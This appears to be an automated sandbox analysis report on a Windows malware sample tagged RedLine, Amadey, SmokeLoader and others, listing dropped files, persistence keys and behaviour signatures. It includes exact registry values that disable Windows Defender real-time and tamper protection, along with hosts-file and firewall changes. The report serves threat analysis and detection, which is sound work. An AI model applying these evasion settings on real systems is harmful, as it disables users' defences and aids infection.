Malware Analysis Report

2025-01-23 11:32

Sample ID 231010-1lwkrsfc97
Target d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8
SHA256 d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8

Threat Level: Known bad

The file d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan

RedLine payload

SectopRAT payload

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Detects Healer an antivirus disabler dropper

DcRat

Modifies Windows Defender Real-time Protection settings

RedLine

Healer

Glupteba

Amadey

SmokeLoader

SectopRAT

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Drops file in Drivers directory

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of UnmapMainImage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 21:44

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 21:44

Reported

2023-10-10 21:47

Platform

win10v2004-20230915-en

Max time kernel

127s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detects Healer an antivirus disabler dropper

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A

Modifies Windows Firewall

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Stops running service(s)

evasion

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AA18.bat | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FCC0.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A35F.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A6EA.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1th20qt9.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AA18.bat | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AE11.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FCC0.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\source1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DF.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AFB.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E19.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DF.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DF.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\AF69.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\A35F.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\sc.exe | N/A
N/A | N/A | C:\Windows\System32\sc.exe | N/A
N/A | N/A | C:\Windows\System32\sc.exe | N/A
N/A | N/A | C:\Windows\System32\sc.exe | N/A
N/A | N/A | C:\Windows\System32\sc.exe | N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A

Creates scheduled task(s)

persistence

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A
